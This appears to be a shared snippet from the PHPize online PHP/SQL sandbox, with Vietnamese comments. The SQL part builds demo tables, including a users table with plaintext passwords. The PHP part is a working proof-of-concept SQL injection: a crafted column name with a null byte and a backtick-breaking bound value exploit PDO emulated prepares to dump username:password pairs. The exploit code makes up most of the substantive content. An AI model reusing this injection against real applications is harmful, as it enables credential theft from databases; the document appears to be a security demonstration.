Hi! Could we please enable some services and cookies to improve your experience and our website?

PHPize Online / SQLize Online  /  SQLtest Online

A A A
Login    Share code      Blog   FAQ

Online Sandbox for SQL and PHP: Write, Run, Test, and Share SQL Queries and PHP Code

Copy Format Clear
-- Tạo bảng fruit gốc từ ví dụ CREATE TABLE fruit ( id INT AUTO_INCREMENT PRIMARY KEY, name VARCHAR(50), sku VARCHAR(20) ); -- Tạo bảng users chứa thông tin nhạy cảm để exploit CREATE TABLE users ( id INT AUTO_INCREMENT PRIMARY KEY, username VARCHAR(100) UNIQUE, password VARCHAR(255), email VARCHAR(100), role VARCHAR(20) DEFAULT 'user' ); -- Tạo bảng orders với dữ liệu tài chính CREATE TABLE orders ( id INT AUTO_INCREMENT PRIMARY KEY, user_id INT, product_name VARCHAR(200), amount DECIMAL(10,2), status VARCHAR(20) DEFAULT 'pending', created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP, FOREIGN KEY (user_id) REFERENCES users(id) ); -- Tạo bảng admin_logs với thông tin hệ thống CREATE TABLE admin_logs ( id INT AUTO_INCREMENT PRIMARY KEY, action VARCHAR(100), user_id INT, timestamp TIMESTAMP DEFAULT CURRENT_TIMESTAMP, ip_address VARCHAR(45), details TEXT ); -- Insert dữ liệu mẫu vào fruit INSERT INTO fruit (name, sku) VALUES ('apple', 'FRU-APL'), ('banana', 'FRU-BAN'), ('orange', 'FRU-ORG'), ('grape', 'FRU-GRP'); -- Insert dữ liệu nhạy cảm vào users INSERT INTO users (username, password, email, role) VALUES ('admin', 'P@ssw0rd123!', 'admin@company.com', 'admin'), ('john_doe', 'secret123', 'john@company.com', 'user'), ('jane_smith', 'mypassword', 'jane@company.com', 'manager'), ('bob_wilson', 'qwerty456', 'bob@company.com', 'user'); -- Insert dữ liệu orders INSERT INTO orders (user_id, product_name, amount, status) VALUES (1, 'Premium Software License', 9999.99, 'completed'), (2, 'Monthly Subscription', 29.99, 'pending'), (3, 'Enterprise Package', 15000.00, 'completed'), (4, 'Basic Plan', 9.99, 'active'); -- Insert admin logs INSERT INTO admin_logs (action, user_id, ip_address, details) VALUES ('LOGIN', 1, '192.168.1.100', 'Admin login successful'), ('DELETE_USER', 1, '192.168.1.100', 'Deleted inactive user account'), ('BACKUP_DB', 1, '192.168.1.100', 'Database backup completed'), ('CONFIG_CHANGE', 3, '192.168.1.101', 'Updated security settings');

Stuck with a problem? Got Error? Ask AI support!

Copy Clear
Copy Format Clear
<?php // Trên PHPize.online, biến $pdo đã được cung cấp sẵn kết nối MySQL 8.0 $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, true); // 1. Cài payload ngay trong code // Ví dụ payload để exploit bảng users $col = '?#' . chr(0); $name = "x` FROM (SELECT CONCAT(username,':',password) AS `x` FROM users)y;#"; // 2. Xây dựng tên cột với payload $col = '`' . str_replace('`', '``', $col) . '`'; // 3. Prepare & execute (bind đúng 1 giá trị vì UNION-based đã comment phần còn lại) $stmt = $pdo->prepare("SELECT $col FROM fruit WHERE name = ?"); $stmt->execute([$name]); // 4. Fetch và in kết quả $data = $stmt->fetchAll(PDO::FETCH_ASSOC); foreach ($data as $row) { echo join(' : ', $row) . PHP_EOL; } ?>
Copy Clear
Have a question? Ask in our telegram chat!
Contact us:
© 2025 PHPize - format run and share PHP code with SQL queries online | About project | Privacy Policy and Disclaimer
PHP versions: PHP 7.4, PHP 8.0, PHP 8.1, PHP 8.2, PHP 8.3, PHP 8.4
RDBMS versions: MySQL 8.0, MySQL 8.0 Sakila (ReadOnly), MySQL 9.3.0, MariaDB 11.4, MariaDB 11.8, MariaDB 10, MariaDB 10 Sakila (ReadOnly), SQLite 3, SQLite 3 Preloaded, PostgreSQL 10 Bookings (ReadOnly), PostgreSQL 13, PostgreSQL 14, PostgreSQL 15, PostgreSQL 16, PostgreSQL 17 + PostGIS, PostgreSQL 17 + PostGIS WorkShop (ReadOnly), MS SQL Server 2017, MS SQL Server 2019, MS SQL Server 2022, MS SQL Server 2022 AdventureWorks (ReadOnly), Firebird 4.0, Firebird 4.0 (Employee), Oracle Database 19c (HR), Oracle Database 21c, Oracle Database 23c Free, SOQOL, ClickHouse